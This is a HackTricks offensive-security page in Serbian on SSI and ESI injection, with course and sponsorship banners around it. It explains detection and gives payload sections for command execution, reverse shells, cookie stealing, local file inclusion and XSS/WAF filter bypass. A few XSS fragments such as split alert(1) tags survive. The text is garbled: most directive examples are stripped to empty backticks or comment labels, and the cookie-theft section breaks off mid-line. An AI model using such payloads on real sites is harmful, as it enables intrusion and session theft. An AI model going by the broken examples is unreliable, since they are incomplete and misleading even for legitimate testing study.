# Server Side Inclusion/Edge Side Inclusion Injection {% hint style="success" %} Learn & practice AWS Hacking:

[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)

\ Learn & practice GCP Hacking:

[**HackTricks Training GCP Red Team Expert (GRTE)**

](https://training.hacktricks.xyz/courses/grte)

Support HackTricks

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

{% endhint %} ## Server Side Inclusion Basic Information **(Uvod preuzet iz [Apache docs](https://httpd.apache.org/docs/current/howto/ssi.html))** SSI (Server Side Includes) su direktive koje su **postavljene u HTML stranicama i evaluiraju se na serveru** dok se stranice serviraju. Omogućavaju vam da **dodate dinamički generisani sadržaj** postojećoj HTML stranici, bez potrebe da se cela stranica servira putem CGI programa ili druge dinamičke tehnologije.\ Na primer, možete postaviti direktivu u postojeću HTML stranicu, kao što je: `` I, kada se stranica servira, ovaj fragment će biti evaluiran i zamenjen svojom vrednošću: `Tuesday, 15-Jan-2013 19:28:54 EST` Odluka kada koristiti SSI, a kada imati vašu stranicu potpuno generisanu nekim programom, obično zavisi od toga koliko je stranica statična, a koliko treba da se preračunava svaki put kada se stranica servira. SSI je odličan način da dodate male delove informacija, kao što je trenutni vreme - prikazano iznad. Ali ako se većina vaše stranice generiše u trenutku kada se servira, trebate potražiti neko drugo rešenje. Možete pretpostaviti prisustvo SSI ako web aplikacija koristi datoteke sa ekstenzijama \*\* `.shtml`, `.shtm` ili `.stm`\*\*, ali to nije jedini slučaj. Tipična SSI ekspresija ima sledeći format: ``` ``` ### Провера ```javascript // Document name // Date // File inclusion // Including files (same directory) // CGI Program results // Including virtual files (same directory) // Modification date of a file // Command exec // Command exec // Reverse shell // Print all variables // Setting variables ``` ## Edge Side Inclusion Postoji problem **keširanja informacija ili dinamičkih aplikacija** jer deo sadržaja može da bude **različit** prilikom sledećeg preuzimanja sadržaja. To je ono za šta se koristi **ESI**, da označi korišćenje ESI oznaka za **dinamički sadržaj koji treba da se generiše** pre slanja keširane verzije.\ Ako **napadač** može da **ubaci ESI oznaku** unutar keširanog sadržaja, onda bi mogao da **ubaci proizvoljan sadržaj** u dokument pre nego što bude poslat korisnicima. ### ESI Detection Sledeća **zaglavlja** u odgovoru sa servera znači da server koristi ESI: ``` Surrogate-Control: content="ESI/1.0" ``` Ako ne možete pronaći ovaj header, server **možda koristi ESI u svakom slučaju**.\ **Pristup slepoj eksploataciji se takođe može koristiti** jer bi zahtev trebao stići do servera napadača: ```javascript // Basic detection hello // If previous is reflected as "hello", it's vulnerable // Blind detection // XSS Exploitation Example // Cookie Stealer (bypass httpOnly flag) // Introduce private local files (Not LFI per se) // Valid for Akamai, sends debug information in the response ``` ### ESI eksploatacija [GoSecure je kreirao](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) tabelu za razumevanje mogućih napada koje možemo pokušati protiv različitih ESI-capable softvera, u zavisnosti od podržane funkcionalnosti: * **Includes**: Podržava `` direktivu * **Vars**: Podržava `` direktivu. Korisno za zaobilaženje XSS filtera * **Cookie**: Kolačići dokumenta su dostupni ESI engine-u * **Upstream Headers Required**: Surrogate aplikacije neće obraditi ESI izjave osim ako upstream aplikacija ne obezbedi zaglavlja * **Host Allowlist**: U ovom slučaju, ESI uključivanja su moguća samo sa dozvoljenih server hostova, što čini SSRF, na primer, mogućim samo protiv tih hostova | **Softver** | **Includes** | **Vars** | **Kolačići** | **Upstream Headers Required** | **Host Whitelist** | | :--------------------------: | :----------: | :------: | :---------: | :---------------------------: | :----------------: | | Squid3 | Da | Da | Da | Da | Ne | | Varnish Cache | Da | Ne | Ne | Da | Da | | Fastly | Da | Ne | Ne | Ne | Da | | Akamai ESI Test Server (ETS) | Da | Da | Da | Ne | Ne | | NodeJS esi | Da | Da | Da | Ne | Ne | | NodeJS nodesi | Da | Ne | Ne | Ne | Opcionalno | #### XSS Sledeća ESI direktiva će učitati proizvoljnu datoteku unutar odgovora servera ```xml ``` #### Zaobilaženje zaštite od XSS na klijentu ```xml x=>alert(/Chrome%20XSS%20filter%20bypass/);> Use to bypass WAFs: ipt>alert(1)ript> error=alert(1)> ``` #### Ukradi kolačić * Udaljeno ukradeni kolačić ```xml ``` * Ukrao kolačić HTTP\_ONLY pomoću XSS reflektovanjem u odgovoru: ```bash # This will reflect the cookies in the response # Reflect XSS (you can put '">

[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)

\ Učite i vežbajte GCP Hacking:

[**HackTricks Training GCP Red Team Expert (GRTE)**

](https://training.hacktricks.xyz/courses/grte)

Podrška HackTricks

* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! * **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

{% endhint %}